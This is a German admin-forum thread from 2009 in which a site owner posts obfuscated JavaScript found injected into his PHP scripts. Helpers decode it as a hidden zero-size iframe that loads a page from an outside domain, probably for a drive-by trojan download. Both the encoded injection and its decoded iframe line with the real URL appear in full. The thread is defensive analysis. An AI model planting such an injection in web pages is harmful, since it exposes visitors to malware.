Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Was bedeutet das bzw. was kann ich bei sowas lesbar machen

Frage Entwicklung JavaScript

Mitglied: 35801

35801 (Level 1)

08.04.2009, aktualisiert 13.05.2009, 4760 Aufrufe, 9 Kommentare

Ich habe ein einer meiner PHP Scripte folgendes gefunden...
01.
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006d\u0075\u0073\u0069\u0063\u0032\u0034\u0073\u0068\u006f\u0070\u002e\u006e\u0065\u0074\u002f\u0032\u002f\u0069\u006e\u002e\u0070\u0068\u0070\u0027\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0027\u0030\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0030\u0027\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0027\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
Scheinbar eine hinterlassenschaft eines netten Menschen, der sich illegal zu meinem Webspace Zugang verschafft hat... Wie kann ich sowas wieder leesbar machen bzw. herausfinden was das eigentlich tut?
Mitglied: Woolfsmann
08.04.2009 um 14:08 Uhr
Hi,

nach einer kurzen google suche komm denke ich das hier hilft dir.

http://www.heise.de/security/Schaedlingen-auf-der-Spur--/artikel/49687

gruß
Woolfsmann
Bitte warten ..
Mitglied: 35801
08.04.2009 um 14:15 Uhr
Danke... Hab mal in den Artikel reingesehen... aber wie und womit DECODIERT man das ??

Ich müsste wissen was das macht.
Bitte warten ..
Mitglied: SlainteMhath
08.04.2009 um 14:41 Uhr
Hi,

Ich müsste wissen was das macht.
das script fuegt einen unsichtbaren iframe auf Deiner Seite ein:
01.
<iframe src="http://.../in.php" width=0 height=0 style='display:none'></iframe>
Und der versucht dann sicher einen trojaner per drive-by download auszuliefern.

lg,
Slainte
Bitte warten ..
Mitglied: 35801
08.04.2009 um 15:54 Uhr
OK Danke!

Aber wie hast du das decodiert?

Ich suche nach einer Möglichkeit das selber zu decodieren, weil ich an einigen Stellen sowas gefunden habe...
Bitte warten ..
Mitglied: miniversum
08.04.2009 um 16:09 Uhr
Das ist leicht zu "decodieren". Du schnapst dir eine ASCII-Tabelle und los gehts.
\u003c
bedeutet z.B. für den Hexwert 0x3C. Schaust du den in einer ASCII Tabelle nach erhällst du dafür das Zeichen "<".
So machst du das dann mit allen Werten. Das kannst du auch per Suchen und ersetzen machen.
Die ersten paar Werte
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063
ergeben somit
<iframe src=

miniversum
Bitte warten ..
Mitglied: SlainteMhath
08.04.2009 um 16:11 Uhr
oder Du ersetzt das "document.write" einfach durch ein "alert"
Bitte warten ..
Mitglied: Biber
08.04.2009 um 16:17 Uhr
Moin diaz1983,

diese Form der Zeichendarstellung ist eigentlich nur die javatypische Schreibweise als Unicode-Character.

Wenn Du eine handelsübliche Übersetzungstabelle zur Hand nimmt (siehe bei wikipedia oder diese hier, dann kannst relativ fileßend lesen:

\u003c <
\u0069 i
\u0066 f
\u0072 r
\u0061 a
\u006d m
\u0065 e
\u0020
\u0020
\u0073 s
\u0072 r
\u0063 c
.... wie SlainteMhath schon vorgeturnt hat.

Grüße
Biber
[Edit] uppps... zu langsam... [/Edit]
Bitte warten ..
Mitglied: 35801
08.04.2009 um 16:18 Uhr
Hab noch ne nette Methode gefunden...

Zumindest mit Python ging das ganz einfach auf meinem Fedora-System

01.
[peter@fedoraPC ~]# python 
02.
Python 2.5.2 (r252:60911, Sep 30 2008, 15:41:38)  
03.
[GCC 4.3.2 20080917 (Red Hat 4.3.2-4)] on linux2 
04.
Type "help", "copyright", "credits" or "license" for more information. 
05.
 
06.
>>> print u"\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006d\u0075\u0073\u0069\u0063\u0032\u0034\u0073\u0068\u006f\u0070\u002e\u006e\u0065\u0074\u002f\u0032\u002f\u0069\u006e\u002e\u0070\u0068\u0070\u0027\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0027\u0030\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0030\u0027\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0027\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e" 
07.
<iframe  src='http://music24shop.net/2/in.php' width='0' height='0' style='display:none'></iframe>
Bitte warten ..
Mitglied: 35801
08.04.2009 um 16:21 Uhr
OK Danke...

Hab nur ein paar passagen, die etwas länger (5-6 mal so lang) sind und darum wollt ich die "zu Fuß - Methode" vermeiden...
Bitte warten ..
Neuester Wissensbeitrag
Windows 10

Sticky Notes - Autostart unterbinden

Tipp von Pedant zum Thema Windows 10 ...

Heiß diskutierte Inhalte
Batch & Shell
gelöst Base64 Decode (Batch,VBS) (26)

Frage von clragon zum Thema Batch & Shell ...

Flatrates
DeutschlandLAN der Telekom - welche internen IPs? (19)

Frage von qualidat zum Thema Flatrates ...